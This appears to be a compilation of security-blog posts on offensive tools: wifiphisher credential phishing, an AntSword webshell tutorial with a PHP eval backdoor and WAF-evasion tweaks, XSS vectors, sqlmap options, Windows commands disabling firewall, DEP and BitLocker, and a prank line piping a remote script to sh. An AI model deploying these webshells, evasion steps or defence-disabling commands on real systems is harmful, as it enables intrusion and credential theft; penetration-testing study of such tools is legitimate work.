wifiphisher – Man-in-the-middle attack software for WiFi

Wifiphisher is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing. Using Wifiphisher, penetration testers can easily achieve a man-in-the-middle position against wireless clients by performing targeted Wi-Fi association attacks. Wifiphisher can be further used to mount victim-customized web phishing attacks against the connected clients in order to capture credentials (e.g. from third party login pages or WPA/WPA2 Pre-Shared Keys) or infect the victim stations with malwares. [1] [2]


In Kali Linux, we can use following command to install wifiphisher

sudo apt install wifiphisher

or using git

git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python setup.py install



wifiphisher -i wlan0

2 Use Up/Down Arrow keys to navigate through access points, hit Enter key to select


3 We will be asked for which scenario to use

wifiphisher - Available Phishing Scenarios
wifiphisher – Available Phishing Scenarios

4 If we select “2 – Firmware Upgrade Page”, a monitoring screen will appear, wifiphisher will monitor the device which is trying to connect to non-existent network, then create fake version and trick them to connect.

( When victim have submitted the password, we will be notified in wifiphiser )

A successful attack
A successful attack

5 After the victim is joined, they will be asked to enter the wifi password

Fake router configuration page asking for wifi password
Fake router configuration page asking for wifi password

(Other fake login screens)

Fake OAuth Login Page
Fake OAuth Login Page
Fake web-based network manager
Fake web-based network manager

Then the attacked ends, captured password will be displayed on the screen

Attack ends, password shown
Attack ends, password shown


[1] https://wifiphisher.org

[2] https://github.com/wifiphisher/wifiphisher

AntSword – a Security Tool for Post Exploitation


AntSword is an very easy to use tool for pentesters, security groups as a Post Exploitation tool it can also be used for webmasters etc. Do not use this tool on unauthorized servers/environments or for illegal purpose. It can be a better alternative to Weevely

Description from Official website

AntSword is an open source, cross-platform website administration tool, being designed to meet the needs of penetration testers together with security researchers with permissions and/or authorizations as well as webmasters.
Anyone shall not use it for illegal purposes and profitability. Besides that, publishing unauthorized modified version is also prohibited, or otherwise bear legal responsibilities.

1 Installation

1.1 Download correct file/zip file

The AntSword-Loader (or A launcher) can be downloaded here: https://github.com/AntSwordProject/AntSword-Loader

It can be used on Microsoft Windows, Linux and macOS platforms.

Windows AntSword
Windows AntSword

1.2 Install or unzip content

Here, we unzip to “C:\Users\win10\Desktop\as-4.0.3”

Unzip AntSword
Unzip AntSword

1.3 Launch “AntSword.exe”


1.4 Click on “Initialize” button

1.5 Select a working directory

In this example, we create a “working-dir” working directory under main directory which is “C:\Users\win10\Desktop\as-4.0.3\working-dir”

Select the folder, then click on “Select folder” button

It will start to download necessary package (Which is “antSword-master.zip”)

(You might encounter following error)

Unzip Error Code: [object Object]

Unzip Error Code: [object Object]
Unzip Error Code: [object Object]

If you have encountered this error follow 1.5.1

1.5.1 Fix the error

Open the working directory we have just selected, a folder with name “antSword-master” and a zip file with name “antSword-master.zip” may appear there, delete them.

1.5.2 Try to launch the AntSword-Loader with Admin rights, then repeat Step 1.3 to Step 1.5 again.

We should be able to see following screen

download successful Extracting file...
download successful Extracting file…

When it’s done

Set up successful Please manually restart later!
Set up successful Please manually restart later!

Then, this Window will disappear, the program will terminate by itself.

1.6 Now we can launch the “AntSword.exe” again, it is now ready to be used

2 Simple usage Demonstration

First, we need to deploy a webshell/Sometimes… so called backdoor/Trojan

In this example we are going to use PHP

2.1 Create a php file “test.php”

2.2 Save following content to “test.php” file

<?php eval($_POST['mytestshell']); ?>

2.3 Upload to your own testing server (Please do not test on production server or any server which does not belong to you)

2.4 Right click on blank space, click on “Add”

2.5 Enter correct server details

Shell url: Your test.php path

Shell pwd: Shell password which is the content behind $_POST, “mytestshell” in this case

Shell type: PHP

2.6 Click on “Add” button

Add Shell
Add Shell

2.5 Now it will appear under “Shell Lists”

Shell Lists
Shell Lists

2.6 Double click on the item, we can now see all files on the server (As long as the user who is running the server process has corresponding privileges)

View folders, files on the server
View folders, files on the server
View folders, files on the server
View folders, files on the server

We can even upload, download files to/from selected folder/file, create, modify, delete files and folders, even open Terminal

AntSword connected to WebShell
AntSword connected to WebShell
AntSword connected to WebShell
AntSword connected to WebShell

3 Other

It also supports other Shell types besides PHP

Add shell - Shell type
Add shell – Shell type

Send customized HTTP Header/Body value

Add shell - HTTP Header, Body
Add shell – HTTP Header, Body

Other settings

Add shell - Other
Add shell – Other

Proxy, Plugin Store, Encoder etc.


AntSword official documentation: https://doc.u0u.us/en/getting_started/first_shell.html

Bonus 1 – Use AntSword with PHP get request

Wonder how to use AntSword with $_GET rather than $_POST in PHP?

Here is how

The PHP file

Rather than

<?php eval($_POST['mytestshell']); ?>

We use

<?php eval($_GET['mytestshell']); ?>

The Settings in AntSword

Shell url: http://xxxxxxxxxx.com/test.php?mytestshell=eval($_POST[‘mypswd’]);

Shell pwd: mypswd

Bonus 2 – Modify User-Agents

By default, AntSword uses “antSword/v2.1” or “antSword/v2.0” as user agent when updating the webshell information or connecting the webshell. Which can be recognized by WAF or human easily.

To change User-Agent for AntSword.

There are 2 files and 3 places we need to modify

b2.1.1 File 1 is “request.js” under “X:\path\to\antsword\working-dir\antSword-master\modules\request.js”

Note: “working-dir” was created during Step 1.5

b2.1.2 Open “request.js” via Notepad or any text editor, Search for “USER_AGENT”

b2.1.3 Change “antSword/v2.1” to what ever you like, then save the file

b2.2.1 File 2 is “update.js” under “X:\path\to\antsword\working-dir\antSword-master\modules\update.js”

b2.2.2 Open “update.js” via Notepad or any text editor, Search for “User-Agent”

b2.2.3 Change “antSword/v2.0” to what ever you like, then save the file

Bonus 3 – Latest User-Agents


on Windows

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on Linux

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on macOS

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on Android

Mozilla/5.0 (Linux; Android 8.0.0;) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Mobile Safari/537.36

on iOS

Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/80.0.3987.95 Mobile/15E148 Safari/605.1


on Windows

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/74.0

on Linux

Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/74.0

on macOS

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/74.0

on Android

Mozilla/5.0 (Android 8.0.0; Mobile; rv:61.0) Gecko/61.0 Firefox/68.0

on iOS

Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/23.0 Mobile/16B92 Safari/605.1.15

IE 11/Internet Explorer 11 on Windows 10

Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko

Edge on Windows 10

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Edg/80.0.361.62


Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)

There are many more features we can utilize, including encoding/decoding, which is very helpful when trying to evading Web Application Firewall (WAF), plugins, Multipart payload etc.

Warning: Do not use or test this tool on unauthorised servers.

Cross-site scripting (XSS) cheat sheet from PortSwigger

onactivate (IE)

<a id=x tabindex=1 onactivatealert(1)></a>

onafterprint (Chrome, Firefox, IE)

<body onafterprint=alert(a)>


The cheat sheet contains many vectors that can help you bypass WAFs and filters. You can select vectors by the event, tag or browser and a proof of concept is included for every vector. This cheat sheet is regularly updated

More can be found from official website

Official website

PDF version download

Capture The Flag (CTF) – Tools

(Some of the tools are quite old but can still be useful though)

Collection of setup scripts to create an install of various security research tools. Of course, this isn’t a hard problem, but it’s really nice to have them in one place that’s easily deployable to new machines and so forth. The install-scripts for these tools are checked regularly, the results can be found on the build status page.

Installers for the following tools are included:

binaryDirectoryaflState-of-the-art fuzzer.
binaryDirectoryangrNext-generation binary analysis engine from Shellphish.
binaryDirectorybarfBinary Analysis and Reverse-engineering Framework.
binaryDirectorybindeadA static analysis tool for binaries.
binaryLibrarycapstoneMulti-architecture disassembly framework.
binaryDirectorychecksecCheck binary hardening settings.
binaryDirectorycodereasonSemantic Binary Code Analysis Framework.
binaryDirectorycrosstool-ngCross-compilers and cross-architecture tools.
binaryDirectorycross2A set of cross-compilation tools from a Japanese book on C.
binaryDirectoryelfkickersA set of utilities for working with ELF files.
binaryDirectoryelfparserQuickly determine the capabilities of an ELF binary through static analysis.
binaryDirectoryevilizeTool to create MD5 colliding binaries
binaryDirectorygdbUp-to-date gdb with python2 bindings.
binaryDirectorygdb-heapgdb extension for debugging heap issues.
binaryDirectorygefEnhanced environment for gdb.
binaryDirectoryhongfuzzA general-purpose, easy-to-use fuzzer with interesting analysis options.
binaryLibrarykeystoneLightweight multi-architecture assembler framework.
binaryDirectorylibheapgdb python library for examining the glibc heap (ptmalloc)
binaryLibraryliefLibrary to Instrument Executable Formats.
binaryDirectorymiasmReverse engineering framework in Python.
binaryDirectoryone_gadgetMagic gadget search for libc.
binaryDirectorypandaPlatform for Architecture-Neutral Dynamic Analysis.
binaryDirectorypathgrindPath-based, symbolically-assisted fuzzer.
binaryDirectorypedaEnhanced environment for gdb.
binaryDirectorypreenyA collection of helpful preloads (compiled for many architectures!).
binaryDirectorypwndbgEnhanced environment for gdb. Especially for pwning.
binaryDirectorypwntoolsUseful CTF utilities.
binaryDirectorypython-pinPython bindings for pin.
binaryDirectoryqemuLatest version of qemu!
binaryDirectoryqiraParallel, timeless debugger.
binaryDirectoryradare2Some crazy thing crowell likes.
binaryDirectoryrappelA linux-based assembly REPL.
binaryDirectoryropperAnother gadget finder.
binaryDirectoryrp++Another gadget finder.
binaryDirectoryrrRecord and Replay Debugging Framework
binaryDirectoryscratchabitEasily retargetable and hackable interactive disassembler
binaryDirectoryscratchablockYet another crippled decompiler project
binaryDirectoryseccomp-toolsProvides powerful tools for seccomp analysis
binaryDirectoryshellnoobShellcode writing helper.
binaryDirectoryshellsploitShellcode development kit.
binaryDirectorysnowmanCross-architecture decompiler.
binaryDirectorytaintgrindA valgrind taint analysis tool.
binaryLibraryunicornMulti-architecture CPU emulator framework.
binaryDirectoryvalgrindA Dynamic Binary Instrumentation framework with some built-in tools.
binaryDirectoryvillocVisualization of heap operations.
binaryDirectoryvirtualsocketA nice library to interact with binaries.
binaryDirectorywccThe Witchcraft Compiler Collection is a collection of compilation tools to perform binary black magic on the GNU/Linux and other POSIX platforms.
binaryDirectoryxropGadget finder.
binaryDirectorymanticoreManticore is a prototyping tool for dynamic binary analysis, with support for symbolic execution, taint analysis, and binary instrumentation.
forensicsDirectorybinwalkFirmware (and arbitrary file) analysis tool.
forensicsDirectorydislockerTool for reading Bitlocker encrypted partitions.
forensicsDirectoryfirmware-mod-kitTools for firmware packing/unpacking.
forensicsaptforemostFile carver.
forensicsDirectorypdf-parserTool for digging in PDF files
forensicsDirectorypeepdfPowerful Python tool to analyze PDF documents.
forensicsDirectoryscrdecA decoder for encoded Windows Scripts.
forensicsDirectorytestdiskTestdisk and photorec for file recovery.
cryptoDirectorycribdragInteractive crib dragging tool (for crypto).
cryptoDirectoryfastcollAn md5sum collision generator.
cryptoDirectoryforesightA tool for predicting the output of random number generators. To run, launch “foresee”.
cryptoDirectoryfeatherdusterAn automated, modular cryptanalysis tool.
cryptoDirectorygaloisA fast galois field arithmetic library/toolkit.
cryptoDirectoryhashkillHash cracker.
cryptoDirectoryhashpumpA tool for performing hash length extension attaacks.
cryptoDirectoryhashpump-partialhashHashpump, supporting partially-unknown hashes.
cryptoDirectoryhash-identifierSimple hash algorithm identifier.
cryptoDirectorylibc-databaseBuild a database of libc offsets to simplify exploitation.
cryptoDirectorylittleblackboxDatabase of private SSL/SSH keys for embedded devices.
cryptoDirectorymsieveMsieve is a C library implementing a suite of algorithms to factor large integers.
cryptoDirectorynonce-disrespectNonce-Disrespecting Adversaries: Practical Forgery Attacks on GCM in TLS.
cryptoDirectorypemcrackSSL PEM file cracker.
cryptoDirectorypkcrackPkZip encryption cracker.
cryptoDirectorypython-paddingoraclePadding oracle attack automation.
cryptoDirectoryrevengCRC finder.
cryptoDirectoryssh_decoderA tool for decoding ssh traffic. You will need ruby1.8 from https://launchpad.net/~brightbox/+archive/ubuntu/ruby-ng to run this. Run with ssh_decoder --help for help, as running it with no arguments causes it to crash.
cryptoDirectorysslsplitSSL/TLS MITM.
cryptoDirectoryxortoolXOR analysis tool.
cryptoDirectoryyafuAutomated integer factorization.
webDirectoryburpsuiteWeb proxy to do naughty web stuff.
webDirectorycommixCommand injection and exploitation tool.
webDirectorydirbWeb path scanner.
webDirectorydirsearchWeb path scanner.
webDirectorymitmproxyCLI Web proxy and python library.
webDirectorysqlmapSQL injection automation engine.
webDirectorysubbruteA DNS meta-query spider that enumerates DNS records, and subdomains.
stegoaptpngtoolsPNG’s analysis tool.
stegoDirectorysound-visualizerAudio file visualization.
stegoDirectorysteganabaraAnother image stenography solver.
stegoDirectorystegdetectStenography detection/breaking tool.
stegoDockerstego-toolkitA docker image with dozens of steg tools.
stegoDirectorystegsolveImage stenography solver.
stegoDirectorystegosaurusA steganography tool for embedding arbitrary payloads in Python bytecode (pyc or pyo) files.
stegoDirectoryzstegdetect stegano-hidden data in PNG & BMP.
dsniffaptdsniffGrabs passwords and other data from pcaps/network streams.
androidDirectoryapktoolDissect, dis-assemble, and re-pack Android APKs
androidDirectoryandroid-sdkThe android SDK (adb, emulator, etc).
miscDirectoryxspyTiny tool to spy on X sessions.
miscDirectoryz3Theorem prover from Microsoft Research.
miscDirectoryjdguiJava decompiler.
miscDirectoryvelesBinary data analysis and visualization tool.
miscDirectoryyoutube-dlLatest version of the popular youtube downloader.

There are also some installers for non-CTF stuff to break the monotony!

C magicC-bindA library used to enable function binding in C!
gameDwarf FortressSomething to help you relax after a CTF!
pyvmmonitorpyvmmonitorPyVmMonitor is a profiler with a simple goal: being the best way to profile a Python program.
library collectionsingle_file_libsA large collection of useful single file include libraries written for C/C++
dolphinsudolphinIf your friend ever leaves their laptop unlocked, curl -sSL sh.sudolph.in | sh then wait and see!
tor-browsertor-browserUseful when you need to hit a web challenge from different IPs.


To use, do:

# set up the path
/path/to/ctf-tools/bin/manage-tools setup
source ~/.bashrc
# list the available tools
manage-tools list
# install gdb, allowing it to try to sudo install dependencies
manage-tools -s install gdb
# install pwntools, but don't let it sudo install dependencies
manage-tools install pwntools
# install qemu, but use "nice" to avoid degrading performance during compilation
manage-tools -n install qemu
# uninstall gdb
manage-tools uninstall gdb
# uninstall all tools
manage-tools uninstall all
# search for a tool
manage-tools search preload

Where possible, the tools keep the installs very self-contained (i.e., in to tool/ directory), and most uninstalls are just calls to git clean (NOTE, this is NOT careful; everything under the tool directory, including whatever you were working on, is blown away during an uninstall). One exception to this are python tools, which are installed using the pip package manager if possible. A ctftools virtualenv is created during the manage-tools setup command and can be accessed using the command workon ctftools.


Something not working? I didn’t write (almost) any of these tools, but hit up #ctf-tools on freenode if you’re desperate. Maybe some kind soul will help!

Docker (version 1.7+)

By popular demand, a Dockerfile has been included. You can build a docker image with:

git clone https://github.com/zardus/ctf-tools
cd ctf-tools
docker build -t ctf-tools .

And run it with:

docker run -it ctf-tools

The built image will have ctf-tools cloned and ready to go, but you will still need to install the tools themselves (see above).

Alternatively, you can also pull ctf-tools (with some tools preinstalled) from dockerhub:

docker run -it zardus/ctf-tools


You can build a Vagrant VM with:

wget https://raw.githubusercontent.com/zardus/ctf-tools/master/Vagrantfile
vagrant plugin install vagrant-vbguest
vagrant up

And connect to it via:

vagrant ssh

Kali Linux

Kali Linux (Sana and Rolling), due to manually setting certain libraries to not use the latest version available (sometimes being out of date by years) causes some tools to not install at all, or fail in strange ways. AFL and Panda comes to mind, in fact any tool that uses QEMU 2.30 will probably fail during compilation under Kali. Overriding these libraries breaks other tools included in Kali so your only solution is to either live with some of Kali’s tools being broken, or running another distribution separately such as Ubuntu.

Most tools aren’t affected though.

Adding Tools

To add a tool (say, named toolname), do the following:

  1. Create a toolname directory.
  2. Create an install script.
  3. (optional) if special uninstall steps are required, create an uninstall script.

Install Scripts

The install script will be run with $PWD being toolname. It should install the tool into this directory, in as contained a manner as possible. Ideally, full uninstallation should be possible with a git clean.

The install script should create a bin directory and put its executables there. These executables will be automatically linked into the main bin directory for the repo. They could be launched from any directory, so don’t make assumptions about the location of $0!


The individual tools are all licensed under their own licenses. As for ctf-tools itself, it is licensed under BSD 2-Clause License. If you find it useful, star it on github (https://github.com/zardus/ctf-tools).



Open source automatic SQL injection & database takeover tool

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.



git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev


Get a list of basic options and switches:

python sqlmap.py -h

Get a list of all options and switches:

python sqlmap.py -hh

Official User Manual

Usage: python sqlmap.py [options]
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)
    At least one of these options has to be provided to define the
    -d DIRECT           Connection string for direct database connection
    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -l LOGFILE          Parse target(s) from Burp or WebScarab proxy log file
    -m BULKFILE         Scan multiple targets given in a textual file
    -r REQUESTFILE      Load HTTP request from a file
    -g GOOGLEDORK       Process Google dork results as target URLs
    -c CONFIGFILE       Load options from a configuration INI file
    These options can be used to specify how to connect to the target URL
    --method=METHOD     Force usage of given HTTP method (e.g. PUT)
    --data=DATA         Data string to be sent through POST (e.g. "id=1")
    --param-del=PARA..  Character used for splitting parameter values (e.g. &amp;)
    --cookie=COOKIE     HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
    --cookie-del=COO..  Character used for splitting cookie values (e.g. ;)
    --load-cookies=L..  File containing cookies in Netscape/wget format
    --drop-set-cookie   Ignore Set-Cookie header from response
    --user-agent=AGENT  HTTP User-Agent header value
    --random-agent      Use randomly selected HTTP User-Agent header value
    --host=HOST         HTTP Host header value
    --referer=REFERER   HTTP Referer header value
    -H HEADER, --hea..  Extra header (e.g. "X-Forwarded-For:")
    --headers=HEADERS   Extra headers (e.g. "Accept-Language: fr\nETag: 123")
    --auth-type=AUTH..  HTTP authentication type (Basic, Digest, NTLM or PKI)
    --auth-cred=AUTH..  HTTP authentication credentials (name:password)
    --auth-file=AUTH..  HTTP authentication PEM cert/private key file
    --ignore-code=IG..  Ignore (problematic) HTTP error code (e.g. 401)
    --ignore-proxy      Ignore system default proxy settings
    --ignore-redirects  Ignore redirection attempts
    --ignore-timeouts   Ignore connection timeouts
    --proxy=PROXY       Use a proxy to connect to the target URL
    --proxy-cred=PRO..  Proxy authentication credentials (name:password)
    --proxy-file=PRO..  Load proxy list from a file
    --tor               Use Tor anonymity network
    --tor-port=TORPORT  Set Tor proxy port other than default
    --tor-type=TORTYPE  Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))
    --check-tor         Check to see if Tor is used properly
    --delay=DELAY       Delay in seconds between each HTTP request
    --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
    --retries=RETRIES   Retries when the connection timeouts (default 3)
    --randomize=RPARAM  Randomly change value for given parameter(s)
    --safe-url=SAFEURL  URL address to visit frequently during testing
    --safe-post=SAFE..  POST data to send to a safe URL
    --safe-req=SAFER..  Load safe HTTP request from a file
    --safe-freq=SAFE..  Test requests between two visits to a given safe URL
    --skip-urlencode    Skip URL encoding of payload data
    --csrf-token=CSR..  Parameter used to hold anti-CSRF token
    --csrf-url=CSRFURL  URL address to visit for extraction of anti-CSRF token
    --force-ssl         Force usage of SSL/HTTPS
    --hpp               Use HTTP parameter pollution method
    --eval=EVALCODE     Evaluate provided Python code before the request (e.g.
                        "import hashlib;id2=hashlib.md5(id).hexdigest()")
    These options can be used to optimize the performance of sqlmap
    -o                  Turn on all optimization switches
    --predict-output    Predict common queries output
    --keep-alive        Use persistent HTTP(s) connections
    --null-connection   Retrieve page length without actual HTTP response body
    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts
    -p TESTPARAMETER    Testable parameter(s)
    --skip=SKIP         Skip testing for given parameter(s)
    --skip-static       Skip testing parameters that not appear to be dynamic
    --param-exclude=..  Regexp to exclude parameters from testing (e.g. "ses")
    --dbms=DBMS         Force back-end DBMS to provided value
    --dbms-cred=DBMS..  DBMS authentication credentials (user:password)
    --os=OS             Force back-end DBMS operating system to provided value
    --invalid-bignum    Use big numbers for invalidating values
    --invalid-logical   Use logical operations for invalidating values
    --invalid-string    Use random strings for invalidating values
    --no-cast           Turn off payload casting mechanism
    --no-escape         Turn off string escaping mechanism
    --prefix=PREFIX     Injection payload prefix string
    --suffix=SUFFIX     Injection payload suffix string
    --tamper=TAMPER     Use given script(s) for tampering injection data
    These options can be used to customize the detection phase
    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)
    --string=STRING     String to match when query is evaluated to True
    --not-string=NOT..  String to match when query is evaluated to False
    --regexp=REGEXP     Regexp to match when query is evaluated to True
    --code=CODE         HTTP code to match when query is evaluated to True
    --text-only         Compare pages based only on the textual content
    --titles            Compare pages based only on their titles
    These options can be used to tweak testing of specific SQL injection
    --technique=TECH    SQL injection techniques to use (default "BEUSTQ")
    --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
    --union-cols=UCOLS  Range of columns to test for UNION query SQL injection
    --union-char=UCHAR  Character to use for bruteforcing number of columns
    --union-from=UFROM  Table to use in FROM part of UNION query SQL injection
    --dns-domain=DNS..  Domain name used for DNS exfiltration attack
    --second-url=SEC..  Resulting page URL searched for second-order response
    --second-req=SEC..  Load second-order HTTP request from file
    -f, --fingerprint   Perform an extensive DBMS version fingerprint
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables. Moreover you can run your own SQL statements
    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --hostname          Retrieve DBMS server hostname
    --is-dba            Detect if the DBMS current user is DBA
    --users             Enumerate DBMS users
    --passwords         Enumerate DBMS users password hashes
    --privileges        Enumerate DBMS users privileges
    --roles             Enumerate DBMS users roles
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --count             Retrieve number of entries for table(s)
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    --search            Search column(s), table(s) and/or database name(s)
    --comments          Check for DBMS comments during enumeration
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate
    -X EXCLUDE          DBMS database identifier(s) to not enumerate
    -U USER             DBMS user to enumerate
    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
    --pivot-column=P..  Pivot column name
    --where=DUMPWHERE   Use WHERE condition while table dumping
    --start=LIMITSTART  First dump table entry to retrieve
    --stop=LIMITSTOP    Last dump table entry to retrieve
    --first=FIRSTCHAR   First query output word character to retrieve
    --last=LASTCHAR     Last query output word character to retrieve
    --sql-query=QUERY   SQL statement to be executed
    --sql-shell         Prompt for an interactive SQL shell
    --sql-file=SQLFILE  Execute SQL statements from given file(s)
  Brute force:
    These options can be used to run brute force checks
    --common-tables     Check existence of common tables
    --common-columns    Check existence of common columns
  User-defined function injection:
    These options can be used to create custom user-defined functions
    --udf-inject        Inject custom user-defined functions
    --shared-lib=SHLIB  Local path of the shared library
  File system access:
    These options can be used to access the back-end database management
    system underlying file system
    --file-read=FILE..  Read a file from the back-end DBMS file system
    --file-write=FIL..  Write a local file on the back-end DBMS file system
    --file-dest=FILE..  Back-end DBMS absolute filepath to write to
  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system
    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC
    --os-smbrelay       One click prompt for an OOB shell, Meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process user privilege escalation
    --msf-path=MSFPATH  Local path where Metasploit Framework is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory
  Windows registry access:
    These options can be used to access the back-end database management
    system Windows registry
    --reg-read          Read a Windows registry key value
    --reg-add           Write a Windows registry key value data
    --reg-del           Delete a Windows registry key value
    --reg-key=REGKEY    Windows registry key
    --reg-value=REGVAL  Windows registry key value
    --reg-data=REGDATA  Windows registry key value data
    --reg-type=REGTYPE  Windows registry key value type
    These options can be used to set some general working parameters
    -s SESSIONFILE      Load session from a stored (.sqlite) file
    -t TRAFFICFILE      Log all HTTP traffic into a textual file
    --batch             Never ask for user input, use the default behavior
    --binary-fields=..  Result fields having binary values (e.g. "digest")
    --check-internet    Check Internet connection before assessing the target
    --crawl=CRAWLDEPTH  Crawl the website starting from the target URL
    --crawl-exclude=..  Regexp to exclude pages from crawling (e.g. "logout")
    --csv-del=CSVDEL    Delimiting character used in CSV output (default ",")
    --charset=CHARSET   Blind SQL injection charset (e.g. "0123456789abcdef")
    --dump-format=DU..  Format of dumped data (CSV (default), HTML or SQLITE)
    --encoding=ENCOD..  Character encoding used for data retrieval (e.g. GBK)
    --eta               Display for each output the estimated time of arrival
    --flush-session     Flush session files for current target
    --forms             Parse and test forms on target URL
    --fresh-queries     Ignore query results stored in session file
    --har=HARFILE       Log all HTTP traffic into a HAR file
    --hex               Use hex conversion during data retrieval
    --output-dir=OUT..  Custom output directory path
    --parse-errors      Parse and display DBMS error messages from responses
    --preprocess=PRE..  Use given script(s) for preprocessing of response data
    --repair            Redump entries having unknown character marker (?)
    --save=SAVECONFIG   Save options to a configuration INI file
    --scope=SCOPE       Regexp to filter targets from provided proxy log
    --test-filter=TE..  Select tests by payloads and/or titles (e.g. ROW)
    --test-skip=TEST..  Skip tests by payloads and/or titles (e.g. BENCHMARK)
    --update            Update sqlmap
    -z MNEMONICS        Use short mnemonics (e.g. "flu,bat,ban,tec=EU")
    --alert=ALERT       Run host OS command(s) when SQL injection is found
    --answers=ANSWERS   Set predefined answers (e.g. "quit=N,follow=N")
    --beep              Beep on question and/or when SQL injection is found
    --cleanup           Clean up the DBMS from sqlmap specific UDF and tables
    --dependencies      Check for missing (optional) sqlmap dependencies
    --disable-coloring  Disable console output coloring
    --gpage=GOOGLEPAGE  Use Google dork results from specified page number
    --identify-waf      Make a thorough testing for a WAF/IPS protection
    --list-tampers      Display list of available tamper scripts
    --mobile            Imitate smartphone through HTTP User-Agent header
    --offline           Work in offline mode (only use session data)
    --purge             Safely remove all content from sqlmap data directory
    --skip-waf          Skip heuristic detection of WAF/IPS protection
    --smart             Conduct thorough tests only if positive heuristic(s)
    --sqlmap-shell      Prompt for an interactive sqlmap shell
    --tmp-dir=TMPDIR    Local directory for storing temporary files
    --web-root=WEBROOT  Web server document root directory (e.g. "/var/www")
    --wizard            Simple wizard interface for beginner users

More can be found here: https://github.com/sqlmapproject/sqlmap/wiki/Usage



iGoat – A Learning Tool for iOS App Pentesting and Security (Open Web Application Security Project – OWASP)

iGoat is a learning tool for iOS developers (iPhone, iPad, etc.) and mobile app pentesters. It was inspired by the WebGoat project, and has a similar conceptual flow to it.

As such, iGoat is a safe environment where iOS developers can learn about the major security pitfalls they face as well as how to avoid them. It is made up of a series of lessons that each teach a single (but vital) security lesson.

The lessons are laid out in the following steps:

  1. Brief introduction to the problem.
  2. Verify the problem by exploiting it.
  3. Brief description of available remediations to the problem.
  4. Fix the problem by correcting and rebuilding the iGoat program.

Step 4 is optional, but highly recommended for all iOS developers. Assistance is available within iGoat if you don’t know how to fix a specific problem.

Vulnerabities Covered (version 3.0):

  • Key Management
    • Hardcoded Encryption Keys
    • Key Storage Server Side
    • Random Key Generation
  • URL Scheme Attack
  • Social Engineering
  • Reverse Engineering
    • String Analysis
  • Data Protection (Rest)
    • Local Data Storage (SQLite)
    • Plist Storage
    • Keychain Usage
    • NSUserDefaults Storage
  • Data Protection (Transit)
    • Server Communication
    • Public Key Pinning
  • Authentication
    • Remote Authentication
  • Side Channel Data Leaks
    • Device Logs
    • Cut-and-Paste
    • Backgrounding
    • Keystroke Logging
  • Tampering
    • Method Swizzling
  • Injection Flaws
    • SQL Injection
    • Cross Site Scripting
  • Broken Cryptography

More on: https://github.com/owasp/igoat

Windows Operating System Penetration – Disable security measures via commands

We must have obtained admin privilege first, then execute following commands under administrator privilege.

  • Disable built-in firewall
netsh advfirewall set allprofiles state off
Disable Windows firewall
Disable Windows firewall

  • Disable Windows Defender (Via sc stop or net stop command, or via registry)

  • Disable DEP
bcdedit.exe /set {current} nx AlwaysOff 

  • Disable Bitlocker
manage-bde -off C:

(Use following command to check Bitlocker status)

manage-bde -status C:

A tool for DNS Recon, Brute Forcer, Email Enumeration etc. – Bluto

DNS Recon | Brute Forcer | DNS Zone Transfer | DNS Wild Card Checks | DNS Wild Card Brute Forcer | Email Enumeration | Staff Enumeration | Compromised Account Enumeration | MetaData Harvesting


Pip Install Instructions

Note: To test if pip is already installed execute.

pip -V

(1) Mac and Kali users can simply use the following command to download and install pip.

curl https://bootstrap.pypa.io/get-pip.py -o - | python

Bluto Install Instructions

